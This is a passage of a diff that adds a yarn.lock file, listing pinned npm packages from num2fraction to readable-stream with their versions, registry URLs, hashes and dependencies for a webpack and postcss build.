"https://registry.yarnpkg.com/num2fraction/-/num2fraction-1.2.2.tgz#6f682b6a027a4e9ddfa4564cd2589d1d4e669ede" + +number-is-nan@^1.0.0: + 
version "1.0.1" + resolved "https://registry.yarnpkg.com/number-is-nan/-/number-is-nan-1.0.1.tgz#097b602b53422a522c1afb8790318336941a011d" + +object-assign@^4.0.1, object-assign@^4.1.0, object-assign@^4.1.1: + version "4.1.1" + resolved "https://registry.yarnpkg.com/object-assign/-/object-assign-4.1.1.tgz#2109adc7965887cfc05cbbd442cac8bfbb360863" + +object-copy@^0.1.0: + version "0.1.0" + resolved "https://registry.yarnpkg.com/object-copy/-/object-copy-0.1.0.tgz#7e7d858b781bd7c991a41ba975ed3812754e998c" + dependencies: + copy-descriptor "^0.1.0" + define-property "^0.2.5" + kind-of "^3.0.3" + +object-keys@^1.0.11, object-keys@^1.0.8, object-keys@~1.0.0: + version "1.0.12" + resolved "https://registry.yarnpkg.com/object-keys/-/object-keys-1.0.12.tgz#09c53855377575310cca62f55bb334abff7b3ed2" + +object-visit@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/object-visit/-/object-visit-1.0.1.tgz#f79c4493af0c5377b59fe39d395e41042dd045bb" + dependencies: + isobject "^3.0.0" + +object.assign@^4.1.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/object.assign/-/object.assign-4.1.0.tgz#968bf1100d7956bb3ca086f006f846b3bc4008da" + dependencies: + define-properties "^1.1.2" + function-bind "^1.1.1" + has-symbols "^1.0.0" + object-keys "^1.0.11" + +object.getownpropertydescriptors@^2.0.3: + version "2.0.3" + resolved "https://registry.yarnpkg.com/object.getownpropertydescriptors/-/object.getownpropertydescriptors-2.0.3.tgz#8758c846f5b407adab0f236e0986f14b051caa16" + dependencies: + define-properties "^1.1.2" + es-abstract "^1.5.1" + +object.omit@^2.0.0: + version "2.0.1" + resolved "https://registry.yarnpkg.com/object.omit/-/object.omit-2.0.1.tgz#1a9c744829f39dbb858c76ca3579ae2a54ebd1fa" + dependencies: + for-own "^0.1.4" + is-extendable "^0.1.1" + +object.pick@^1.3.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/object.pick/-/object.pick-1.3.0.tgz#87a10ac4c1694bd2e1cbf53591a66141fb5dd747" + dependencies: + isobject "^3.0.1" + 
+on-finished@^2.1.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/on-finished/-/on-finished-2.3.0.tgz#20f1336481b083cd75337992a16971aa2d906947" + dependencies: + ee-first "1.1.1" + +once@^1.3.0, once@^1.3.1, once@^1.4.0: + version "1.4.0" + resolved "https://registry.yarnpkg.com/once/-/once-1.4.0.tgz#583b1aa775961d4b113ac17d9c50baef9dd76bd1" + dependencies: + wrappy "1" + +onetime@^2.0.0: + version "2.0.1" + resolved "https://registry.yarnpkg.com/onetime/-/onetime-2.0.1.tgz#067428230fd67443b2794b22bba528b6867962d4" + dependencies: + mimic-fn "^1.0.0" + +only@0.0.2: + version "0.0.2" + resolved "https://registry.yarnpkg.com/only/-/only-0.0.2.tgz#2afde84d03e50b9a8edc444e30610a70295edfb4" + +opn@^5.1.0: + version "5.3.0" + resolved "https://registry.yarnpkg.com/opn/-/opn-5.3.0.tgz#64871565c863875f052cfdf53d3e3cb5adb53b1c" + dependencies: + is-wsl "^1.1.0" + +optimize-css-assets-webpack-plugin@^4.0.0: + version "4.0.2" + resolved "https://registry.yarnpkg.com/optimize-css-assets-webpack-plugin/-/optimize-css-assets-webpack-plugin-4.0.2.tgz#813d511d20fe5d9a605458441ed97074d79c1122" + dependencies: + cssnano "^3.10.0" + last-call-webpack-plugin "^3.0.0" + +os-browserify@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/os-browserify/-/os-browserify-0.3.0.tgz#854373c7f5c2315914fc9bfc6bd8238fdda1ec27" + +os-homedir@^1.0.0, os-homedir@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/os-homedir/-/os-homedir-1.0.2.tgz#ffbc4988336e0e833de0c168c7ef152121aa7fb3" + +os-tmpdir@^1.0.0: + version "1.0.2" + resolved "https://registry.yarnpkg.com/os-tmpdir/-/os-tmpdir-1.0.2.tgz#bbe67406c79aa85c5cfec766fe5734555dfa1274" + +osenv@^0.1.4: + version "0.1.5" + resolved "https://registry.yarnpkg.com/osenv/-/osenv-0.1.5.tgz#85cdfafaeb28e8677f416e287592b5f3f49ea410" + dependencies: + os-homedir "^1.0.0" + os-tmpdir "^1.0.0" + +p-finally@^1.0.0: + version "1.0.0" + resolved 
"https://registry.yarnpkg.com/p-finally/-/p-finally-1.0.0.tgz#3fbcfb15b899a44123b34b6dcc18b724336a2cae" + +p-limit@^1.0.0, p-limit@^1.1.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/p-limit/-/p-limit-1.3.0.tgz#b86bd5f0c25690911c7590fcbfc2010d54b3ccb8" + dependencies: + p-try "^1.0.0" + +p-locate@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/p-locate/-/p-locate-2.0.0.tgz#20a0103b222a70c8fd39cc2e580680f3dde5ec43" + dependencies: + p-limit "^1.1.0" + +p-try@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/p-try/-/p-try-1.0.0.tgz#cbc79cdbaf8fd4228e13f621f2b1a237c1b207b3" + +package-json@^4.0.0: + version "4.0.1" + resolved "https://registry.yarnpkg.com/package-json/-/package-json-4.0.1.tgz#8869a0401253661c4c4ca3da6c2121ed555f5eed" + dependencies: + got "^6.7.1" + registry-auth-token "^3.0.1" + registry-url "^3.0.3" + semver "^5.1.0" + +pako@~1.0.5: + version "1.0.6" + resolved "https://registry.yarnpkg.com/pako/-/pako-1.0.6.tgz#0101211baa70c4bca4a0f63f2206e97b7dfaf258" + +parallel-transform@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/parallel-transform/-/parallel-transform-1.1.0.tgz#d410f065b05da23081fcd10f28854c29bda33b06" + dependencies: + cyclist "~0.2.2" + inherits "^2.0.3" + readable-stream "^2.1.5" + +param-case@2.1.x: + version "2.1.1" + resolved "https://registry.yarnpkg.com/param-case/-/param-case-2.1.1.tgz#df94fd8cf6531ecf75e6bef9a0858fbc72be2247" + dependencies: + no-case "^2.2.0" + +parse-asn1@^5.0.0: + version "5.1.1" + resolved "https://registry.yarnpkg.com/parse-asn1/-/parse-asn1-5.1.1.tgz#f6bf293818332bd0dab54efb16087724745e6ca8" + dependencies: + asn1.js "^4.0.0" + browserify-aes "^1.0.0" + create-hash "^1.1.0" + evp_bytestokey "^1.0.0" + pbkdf2 "^3.0.3" + +parse-glob@^3.0.4: + version "3.0.4" + resolved "https://registry.yarnpkg.com/parse-glob/-/parse-glob-3.0.4.tgz#b2c376cfb11f35513badd173ef0bb6e3a388391c" + dependencies: + glob-base "^0.3.0" + is-dotfile "^1.0.0" + 
is-extglob "^1.0.0" + is-glob "^2.0.0" + +parse-json@^2.2.0: + version "2.2.0" + resolved "https://registry.yarnpkg.com/parse-json/-/parse-json-2.2.0.tgz#f480f40434ef80741f8469099f8dea18f55a4dc9" + dependencies: + error-ex "^1.2.0" + +parse-json@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/parse-json/-/parse-json-4.0.0.tgz#be35f5425be1f7f6c747184f98a788cb99477ee0" + dependencies: + error-ex "^1.3.1" + json-parse-better-errors "^1.0.1" + +parseurl@^1.3.0: + version "1.3.2" + resolved "https://registry.yarnpkg.com/parseurl/-/parseurl-1.3.2.tgz#fc289d4ed8993119460c156253262cdc8de65bf3" + +pascalcase@^0.1.1: + version "0.1.1" + resolved "https://registry.yarnpkg.com/pascalcase/-/pascalcase-0.1.1.tgz#b363e55e8006ca6fe21784d2db22bd15d7917f14" + +path-browserify@0.0.0: + version "0.0.0" + resolved "https://registry.yarnpkg.com/path-browserify/-/path-browserify-0.0.0.tgz#a0b870729aae214005b7d5032ec2cbbb0fb4451a" + +path-dirname@^1.0.0: + version "1.0.2" + resolved "https://registry.yarnpkg.com/path-dirname/-/path-dirname-1.0.2.tgz#cc33d24d525e099a5388c0336c6e32b9160609e0" + +path-exists@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/path-exists/-/path-exists-3.0.0.tgz#ce0ebeaa5f78cb18925ea7d810d7b59b010fd515" + +path-is-absolute@1.0.1, path-is-absolute@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/path-is-absolute/-/path-is-absolute-1.0.1.tgz#174b9268735534ffbc7ace6bf53a5a9e1b5c5f5f" + +path-is-inside@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/path-is-inside/-/path-is-inside-1.0.2.tgz#365417dede44430d1c11af61027facf074bdfc53" + +path-key@^2.0.0, path-key@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/path-key/-/path-key-2.0.1.tgz#411cadb574c5a140d3a4b1910d40d80cc9f40b40" + +path-parse@^1.0.5: + version "1.0.5" + resolved "https://registry.yarnpkg.com/path-parse/-/path-parse-1.0.5.tgz#3c1adf871ea9cd6c9431b6ea2bd74a0ff055c4c1" + +path-type@^3.0.0: + version "3.0.0" + 
resolved "https://registry.yarnpkg.com/path-type/-/path-type-3.0.0.tgz#cef31dc8e0a1a3bb0d105c0cd97cf3bf47f4e36f" + dependencies: + pify "^3.0.0" + +pbkdf2@^3.0.3: + version "3.0.16" + resolved "https://registry.yarnpkg.com/pbkdf2/-/pbkdf2-3.0.16.tgz#7404208ec6b01b62d85bf83853a8064f8d9c2a5c" + dependencies: + create-hash "^1.1.2" + create-hmac "^1.1.4" + ripemd160 "^2.0.1" + safe-buffer "^5.0.1" + sha.js "^2.4.8" + +pify@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/pify/-/pify-3.0.0.tgz#e5a4acd2c101fdf3d9a4d07f0dbc4db49dd28176" + +pkg-dir@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/pkg-dir/-/pkg-dir-2.0.0.tgz#f6d5d1109e19d63edf428e0bd57e12777615334b" + dependencies: + find-up "^2.1.0" + +portfinder@^1.0.13: + version "1.0.13" + resolved "https://registry.yarnpkg.com/portfinder/-/portfinder-1.0.13.tgz#bb32ecd87c27104ae6ee44b5a3ccbf0ebb1aede9" + dependencies: + async "^1.5.2" + debug "^2.2.0" + mkdirp "0.5.x" + +posix-character-classes@^0.1.0: + version "0.1.1" + resolved "https://registry.yarnpkg.com/posix-character-classes/-/posix-character-classes-0.1.1.tgz#01eac0fe3b5af71a2a6c02feabb8c1fef7e00eab" + +postcss-calc@^5.2.0: + version "5.3.1" + resolved "https://registry.yarnpkg.com/postcss-calc/-/postcss-calc-5.3.1.tgz#77bae7ca928ad85716e2fda42f261bf7c1d65b5e" + dependencies: + postcss "^5.0.2" + postcss-message-helpers "^2.0.0" + reduce-css-calc "^1.2.6" + +postcss-colormin@^2.1.8: + version "2.2.2" + resolved "https://registry.yarnpkg.com/postcss-colormin/-/postcss-colormin-2.2.2.tgz#6631417d5f0e909a3d7ec26b24c8a8d1e4f96e4b" + dependencies: + colormin "^1.0.5" + postcss "^5.0.13" + postcss-value-parser "^3.2.3" + +postcss-convert-values@^2.3.4: + version "2.6.1" + resolved "https://registry.yarnpkg.com/postcss-convert-values/-/postcss-convert-values-2.6.1.tgz#bbd8593c5c1fd2e3d1c322bb925dcae8dae4d62d" + dependencies: + postcss "^5.0.11" + postcss-value-parser "^3.1.2" + +postcss-discard-comments@^2.0.4: + version "2.0.4" 
+ resolved "https://registry.yarnpkg.com/postcss-discard-comments/-/postcss-discard-comments-2.0.4.tgz#befe89fafd5b3dace5ccce51b76b81514be00e3d" + dependencies: + postcss "^5.0.14" + +postcss-discard-duplicates@^2.0.1: + version "2.1.0" + resolved "https://registry.yarnpkg.com/postcss-discard-duplicates/-/postcss-discard-duplicates-2.1.0.tgz#b9abf27b88ac188158a5eb12abcae20263b91932" + dependencies: + postcss "^5.0.4" + +postcss-discard-empty@^2.0.1: + version "2.1.0" + resolved "https://registry.yarnpkg.com/postcss-discard-empty/-/postcss-discard-empty-2.1.0.tgz#d2b4bd9d5ced5ebd8dcade7640c7d7cd7f4f92b5" + dependencies: + postcss "^5.0.14" + +postcss-discard-overridden@^0.1.1: + version "0.1.1" + resolved "https://registry.yarnpkg.com/postcss-discard-overridden/-/postcss-discard-overridden-0.1.1.tgz#8b1eaf554f686fb288cd874c55667b0aa3668d58" + dependencies: + postcss "^5.0.16" + +postcss-discard-unused@^2.2.1: + version "2.2.3" + resolved "https://registry.yarnpkg.com/postcss-discard-unused/-/postcss-discard-unused-2.2.3.tgz#bce30b2cc591ffc634322b5fb3464b6d934f4433" + dependencies: + postcss "^5.0.14" + uniqs "^2.0.0" + +postcss-filter-plugins@^2.0.0: + version "2.0.3" + resolved "https://registry.yarnpkg.com/postcss-filter-plugins/-/postcss-filter-plugins-2.0.3.tgz#82245fdf82337041645e477114d8e593aa18b8ec" + dependencies: + postcss "^5.0.4" + +postcss-load-config@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/postcss-load-config/-/postcss-load-config-1.2.0.tgz#539e9afc9ddc8620121ebf9d8c3673e0ce50d28a" + dependencies: + cosmiconfig "^2.1.0" + object-assign "^4.1.0" + postcss-load-options "^1.2.0" + postcss-load-plugins "^2.3.0" + +postcss-load-options@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/postcss-load-options/-/postcss-load-options-1.2.0.tgz#b098b1559ddac2df04bc0bb375f99a5cfe2b6d8c" + dependencies: + cosmiconfig "^2.1.0" + object-assign "^4.1.0" + +postcss-load-plugins@^2.3.0: + version "2.3.0" + resolved 
"https://registry.yarnpkg.com/postcss-load-plugins/-/postcss-load-plugins-2.3.0.tgz#745768116599aca2f009fad426b00175049d8d92" + dependencies: + cosmiconfig "^2.1.1" + object-assign "^4.1.0" + +postcss-loader@^2.1.5: + version "2.1.5" + resolved "https://registry.yarnpkg.com/postcss-loader/-/postcss-loader-2.1.5.tgz#3c6336ee641c8f95138172533ae461a83595e788" + dependencies: + loader-utils "^1.1.0" + postcss "^6.0.0" + postcss-load-config "^1.2.0" + schema-utils "^0.4.0" + +postcss-merge-idents@^2.1.5: + version "2.1.7" + resolved "https://registry.yarnpkg.com/postcss-merge-idents/-/postcss-merge-idents-2.1.7.tgz#4c5530313c08e1d5b3bbf3d2bbc747e278eea270" + dependencies: + has "^1.0.1" + postcss "^5.0.10" + postcss-value-parser "^3.1.1" + +postcss-merge-longhand@^2.0.1: + version "2.0.2" + resolved "https://registry.yarnpkg.com/postcss-merge-longhand/-/postcss-merge-longhand-2.0.2.tgz#23d90cd127b0a77994915332739034a1a4f3d658" + dependencies: + postcss "^5.0.4" + +postcss-merge-rules@^2.0.3: + version "2.1.2" + resolved "https://registry.yarnpkg.com/postcss-merge-rules/-/postcss-merge-rules-2.1.2.tgz#d1df5dfaa7b1acc3be553f0e9e10e87c61b5f721" + dependencies: + browserslist "^1.5.2" + caniuse-api "^1.5.2" + postcss "^5.0.4" + postcss-selector-parser "^2.2.2" + vendors "^1.0.0" + +postcss-message-helpers@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/postcss-message-helpers/-/postcss-message-helpers-2.0.0.tgz#a4f2f4fab6e4fe002f0aed000478cdf52f9ba60e" + +postcss-minify-font-values@^1.0.2: + version "1.0.5" + resolved "https://registry.yarnpkg.com/postcss-minify-font-values/-/postcss-minify-font-values-1.0.5.tgz#4b58edb56641eba7c8474ab3526cafd7bbdecb69" + dependencies: + object-assign "^4.0.1" + postcss "^5.0.4" + postcss-value-parser "^3.0.2" + +postcss-minify-gradients@^1.0.1: + version "1.0.5" + resolved "https://registry.yarnpkg.com/postcss-minify-gradients/-/postcss-minify-gradients-1.0.5.tgz#5dbda11373703f83cfb4a3ea3881d8d75ff5e6e1" + dependencies: 
+ postcss "^5.0.12" + postcss-value-parser "^3.3.0" + +postcss-minify-params@^1.0.4: + version "1.2.2" + resolved "https://registry.yarnpkg.com/postcss-minify-params/-/postcss-minify-params-1.2.2.tgz#ad2ce071373b943b3d930a3fa59a358c28d6f1f3" + dependencies: + alphanum-sort "^1.0.1" + postcss "^5.0.2" + postcss-value-parser "^3.0.2" + uniqs "^2.0.0" + +postcss-minify-selectors@^2.0.4: + version "2.1.1" + resolved "https://registry.yarnpkg.com/postcss-minify-selectors/-/postcss-minify-selectors-2.1.1.tgz#b2c6a98c0072cf91b932d1a496508114311735bf" + dependencies: + alphanum-sort "^1.0.2" + has "^1.0.1" + postcss "^5.0.14" + postcss-selector-parser "^2.0.0" + +postcss-modules-extract-imports@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/postcss-modules-extract-imports/-/postcss-modules-extract-imports-1.2.0.tgz#66140ecece38ef06bf0d3e355d69bf59d141ea85" + dependencies: + postcss "^6.0.1" + +postcss-modules-local-by-default@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/postcss-modules-local-by-default/-/postcss-modules-local-by-default-1.2.0.tgz#f7d80c398c5a393fa7964466bd19500a7d61c069" + dependencies: + css-selector-tokenizer "^0.7.0" + postcss "^6.0.1" + +postcss-modules-scope@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/postcss-modules-scope/-/postcss-modules-scope-1.1.0.tgz#d6ea64994c79f97b62a72b426fbe6056a194bb90" + dependencies: + css-selector-tokenizer "^0.7.0" + postcss "^6.0.1" + +postcss-modules-values@^1.3.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/postcss-modules-values/-/postcss-modules-values-1.3.0.tgz#ecffa9d7e192518389f42ad0e83f72aec456ea20" + dependencies: + icss-replace-symbols "^1.1.0" + postcss "^6.0.1" + +postcss-normalize-charset@^1.1.0: + version "1.1.1" + resolved "https://registry.yarnpkg.com/postcss-normalize-charset/-/postcss-normalize-charset-1.1.1.tgz#ef9ee71212d7fe759c78ed162f61ed62b5cb93f1" + dependencies: + postcss "^5.0.5" + +postcss-normalize-url@^3.0.7: + 
version "3.0.8" + resolved "https://registry.yarnpkg.com/postcss-normalize-url/-/postcss-normalize-url-3.0.8.tgz#108f74b3f2fcdaf891a2ffa3ea4592279fc78222" + dependencies: + is-absolute-url "^2.0.0" + normalize-url "^1.4.0" + postcss "^5.0.14" + postcss-value-parser "^3.2.3" + +postcss-ordered-values@^2.1.0: + version "2.2.3" + resolved "https://registry.yarnpkg.com/postcss-ordered-values/-/postcss-ordered-values-2.2.3.tgz#eec6c2a67b6c412a8db2042e77fe8da43f95c11d" + dependencies: + postcss "^5.0.4" + postcss-value-parser "^3.0.1" + +postcss-reduce-idents@^2.2.2: + version "2.4.0" + resolved "https://registry.yarnpkg.com/postcss-reduce-idents/-/postcss-reduce-idents-2.4.0.tgz#c2c6d20cc958284f6abfbe63f7609bf409059ad3" + dependencies: + postcss "^5.0.4" + postcss-value-parser "^3.0.2" + +postcss-reduce-initial@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/postcss-reduce-initial/-/postcss-reduce-initial-1.0.1.tgz#68f80695f045d08263a879ad240df8dd64f644ea" + dependencies: + postcss "^5.0.4" + +postcss-reduce-transforms@^1.0.3: + version "1.0.4" + resolved "https://registry.yarnpkg.com/postcss-reduce-transforms/-/postcss-reduce-transforms-1.0.4.tgz#ff76f4d8212437b31c298a42d2e1444025771ae1" + dependencies: + has "^1.0.1" + postcss "^5.0.8" + postcss-value-parser "^3.0.1" + +postcss-selector-parser@^2.0.0, postcss-selector-parser@^2.2.2: + version "2.2.3" + resolved "https://registry.yarnpkg.com/postcss-selector-parser/-/postcss-selector-parser-2.2.3.tgz#f9437788606c3c9acee16ffe8d8b16297f27bb90" + dependencies: + flatten "^1.0.2" + indexes-of "^1.0.1" + uniq "^1.0.1" + +postcss-selector-parser@^3.1.1: + version "3.1.1" + resolved "https://registry.yarnpkg.com/postcss-selector-parser/-/postcss-selector-parser-3.1.1.tgz#4f875f4afb0c96573d5cf4d74011aee250a7e865" + dependencies: + dot-prop "^4.1.1" + indexes-of "^1.0.1" + uniq "^1.0.1" + +postcss-svgo@^2.1.1: + version "2.1.6" + resolved 
"https://registry.yarnpkg.com/postcss-svgo/-/postcss-svgo-2.1.6.tgz#b6df18aa613b666e133f08adb5219c2684ac108d" + dependencies: + is-svg "^2.0.0" + postcss "^5.0.14" + postcss-value-parser "^3.2.3" + svgo "^0.7.0" + +postcss-unique-selectors@^2.0.2: + version "2.0.2" + resolved "https://registry.yarnpkg.com/postcss-unique-selectors/-/postcss-unique-selectors-2.0.2.tgz#981d57d29ddcb33e7b1dfe1fd43b8649f933ca1d" + dependencies: + alphanum-sort "^1.0.1" + postcss "^5.0.4" + uniqs "^2.0.0" + +postcss-value-parser@^3.0.1, postcss-value-parser@^3.0.2, postcss-value-parser@^3.1.1, postcss-value-parser@^3.1.2, postcss-value-parser@^3.2.3, postcss-value-parser@^3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/postcss-value-parser/-/postcss-value-parser-3.3.0.tgz#87f38f9f18f774a4ab4c8a232f5c5ce8872a9d15" + +postcss-zindex@^2.0.1: + version "2.2.0" + resolved "https://registry.yarnpkg.com/postcss-zindex/-/postcss-zindex-2.2.0.tgz#d2109ddc055b91af67fc4cb3b025946639d2af22" + dependencies: + has "^1.0.1" + postcss "^5.0.4" + uniqs "^2.0.0" + +postcss@^5.0.10, postcss@^5.0.11, postcss@^5.0.12, postcss@^5.0.13, postcss@^5.0.14, postcss@^5.0.16, postcss@^5.0.2, postcss@^5.0.4, postcss@^5.0.5, postcss@^5.0.6, postcss@^5.0.8, postcss@^5.2.16: + version "5.2.18" + resolved "https://registry.yarnpkg.com/postcss/-/postcss-5.2.18.tgz#badfa1497d46244f6390f58b319830d9107853c5" + dependencies: + chalk "^1.1.3" + js-base64 "^2.1.9" + source-map "^0.5.6" + supports-color "^3.2.3" + +postcss@^6.0.0, postcss@^6.0.1, postcss@^6.0.20, postcss@^6.0.22: + version "6.0.23" + resolved "https://registry.yarnpkg.com/postcss/-/postcss-6.0.23.tgz#61c82cc328ac60e677645f979054eb98bc0e3324" + dependencies: + chalk "^2.4.1" + source-map "^0.6.1" + supports-color "^5.4.0" + +prepend-http@^1.0.0, prepend-http@^1.0.1: + version "1.0.4" + resolved "https://registry.yarnpkg.com/prepend-http/-/prepend-http-1.0.4.tgz#d4f4562b0ce3696e41ac52d0e002e57a635dc6dc" + +preserve@^0.2.0: + version "0.2.0" + 
resolved "https://registry.yarnpkg.com/preserve/-/preserve-0.2.0.tgz#815ed1f6ebc65926f865b310c0713bcb3315ce4b" + +prettier@^1.13.0: + version "1.13.5" + resolved "https://registry.yarnpkg.com/prettier/-/prettier-1.13.5.tgz#7ae2076998c8edce79d63834e9b7b09fead6bfd0" + +pretty-bytes@^4.0.2: + version "4.0.2" + resolved "https://registry.yarnpkg.com/pretty-bytes/-/pretty-bytes-4.0.2.tgz#b2bf82e7350d65c6c33aa95aaa5a4f6327f61cd9" + +pretty-error@^2.0.2: + version "2.1.1" + resolved "https://registry.yarnpkg.com/pretty-error/-/pretty-error-2.1.1.tgz#5f4f87c8f91e5ae3f3ba87ab4cf5e03b1a17f1a3" + dependencies: + renderkid "^2.0.1" + utila "~0.4" + +pretty-time@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/pretty-time/-/pretty-time-1.0.0.tgz#544784adecaa2cd7d045ff8a8f1d4791c8e06e23" + dependencies: + is-number "^5.0.0" + nanoseconds "^1.0.0" + +prismjs@^1.13.0: + version "1.15.0" + resolved "https://registry.yarnpkg.com/prismjs/-/prismjs-1.15.0.tgz#8801d332e472091ba8def94976c8877ad60398d9" + optionalDependencies: + clipboard "^2.0.0" + +private@^0.1.6: + version "0.1.8" + resolved "https://registry.yarnpkg.com/private/-/private-0.1.8.tgz#2381edb3689f7a53d653190060fcf822d2f368ff" + +process-nextick-args@~2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/process-nextick-args/-/process-nextick-args-2.0.0.tgz#a37d732f4271b4ab1ad070d35508e8290788ffaa" + +process@^0.11.10: + version "0.11.10" + resolved "https://registry.yarnpkg.com/process/-/process-0.11.10.tgz#7332300e840161bda3e69a1d1d91a7d4bc16f182" + +process@~0.5.1: + version "0.5.2" + resolved "https://registry.yarnpkg.com/process/-/process-0.5.2.tgz#1638d8a8e34c2f440a91db95ab9aeb677fc185cf" + +promise-inflight@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/promise-inflight/-/promise-inflight-1.0.1.tgz#98472870bf228132fcbdd868129bad12c3c029e3" + +prr@~1.0.1: + version "1.0.1" + resolved 
"https://registry.yarnpkg.com/prr/-/prr-1.0.1.tgz#d3fc114ba06995a45ec6893f484ceb1d78f5f476" + +pseudomap@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/pseudomap/-/pseudomap-1.0.2.tgz#f052a28da70e618917ef0a8ac34c1ae5a68286b3" + +public-encrypt@^4.0.0: + version "4.0.2" + resolved "https://registry.yarnpkg.com/public-encrypt/-/public-encrypt-4.0.2.tgz#46eb9107206bf73489f8b85b69d91334c6610994" + dependencies: + bn.js "^4.1.0" + browserify-rsa "^4.0.0" + create-hash "^1.1.0" + parse-asn1 "^5.0.0" + randombytes "^2.0.1" + +pump@^2.0.0, pump@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/pump/-/pump-2.0.1.tgz#12399add6e4cf7526d973cbc8b5ce2e2908b3909" + dependencies: + end-of-stream "^1.1.0" + once "^1.3.1" + +pumpify@^1.3.3: + version "1.5.1" + resolved "https://registry.yarnpkg.com/pumpify/-/pumpify-1.5.1.tgz#36513be246ab27570b1a374a5ce278bfd74370ce" + dependencies: + duplexify "^3.6.0" + inherits "^2.0.3" + pump "^2.0.0" + +punycode@1.3.2: + version "1.3.2" + resolved "https://registry.yarnpkg.com/punycode/-/punycode-1.3.2.tgz#9653a036fb7c1ee42342f2325cceefea3926c48d" + +punycode@2.x.x, punycode@^2.1.0: + version "2.1.1" + resolved "https://registry.yarnpkg.com/punycode/-/punycode-2.1.1.tgz#b58b010ac40c22c5657616c8d2c2c02c7bf479ec" + +punycode@^1.2.4: + version "1.4.1" + resolved "https://registry.yarnpkg.com/punycode/-/punycode-1.4.1.tgz#c0d5a63b2718800ad8e1eb0fa5269c84dd41845e" + +q@^1.1.2: + version "1.5.1" + resolved "https://registry.yarnpkg.com/q/-/q-1.5.1.tgz#7e32f75b41381291d04611f1bf14109ac00651d7" + +query-string@^4.1.0: + version "4.3.4" + resolved "https://registry.yarnpkg.com/query-string/-/query-string-4.3.4.tgz#bbb693b9ca915c232515b228b1a02b609043dbeb" + dependencies: + object-assign "^4.1.0" + strict-uri-encode "^1.0.0" + +querystring-es3@^0.2.0, querystring-es3@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/querystring-es3/-/querystring-es3-0.2.1.tgz#9ec61f79049875707d69414596fd907a4d711e73" 
+ +querystring@0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/querystring/-/querystring-0.2.0.tgz#b209849203bb25df820da756e747005878521620" + +quick-lru@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/quick-lru/-/quick-lru-1.1.0.tgz#4360b17c61136ad38078397ff11416e186dcfbb8" + +randomatic@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/randomatic/-/randomatic-3.0.0.tgz#d35490030eb4f7578de292ce6dfb04a91a128923" + dependencies: + is-number "^4.0.0" + kind-of "^6.0.0" + math-random "^1.0.1" + +randombytes@^2.0.0, randombytes@^2.0.1, randombytes@^2.0.5: + version "2.0.6" + resolved "https://registry.yarnpkg.com/randombytes/-/randombytes-2.0.6.tgz#d302c522948588848a8d300c932b44c24231da80" + dependencies: + safe-buffer "^5.1.0" + +randomfill@^1.0.3: + version "1.0.4" + resolved "https://registry.yarnpkg.com/randomfill/-/randomfill-1.0.4.tgz#c92196fc86ab42be983f1bf31778224931d61458" + dependencies: + randombytes "^2.0.5" + safe-buffer "^5.1.0" + +range-parser@^1.0.3: + version "1.2.0" + resolved "https://registry.yarnpkg.com/range-parser/-/range-parser-1.2.0.tgz#f49be6b487894ddc40dcc94a322f611092e00d5e" + +rc@^1.0.1, rc@^1.1.6, rc@^1.1.7: + version "1.2.8" + resolved "https://registry.yarnpkg.com/rc/-/rc-1.2.8.tgz#cd924bf5200a075b83c188cd6b9e211b7fc0d3ed" + dependencies: + deep-extend "^0.6.0" + ini "~1.3.0" + minimist "^1.2.0" + strip-json-comments "~2.0.1" + +read-pkg-up@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/read-pkg-up/-/read-pkg-up-3.0.0.tgz#3ed496685dba0f8fe118d0691dc51f4a1ff96f07" + dependencies: + find-up "^2.0.0" + read-pkg "^3.0.0" + +read-pkg@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/read-pkg/-/read-pkg-3.0.0.tgz#9cbc686978fee65d16c00e2b19c237fcf6e38389" + dependencies: + load-json-file "^4.0.0" + normalize-package-data "^2.3.2" + path-type "^3.0.0" + +"readable-stream@1 || 2", readable-stream@^2.0.0, readable-stream@^2.0.1, readable-stream@^2.0.2, 
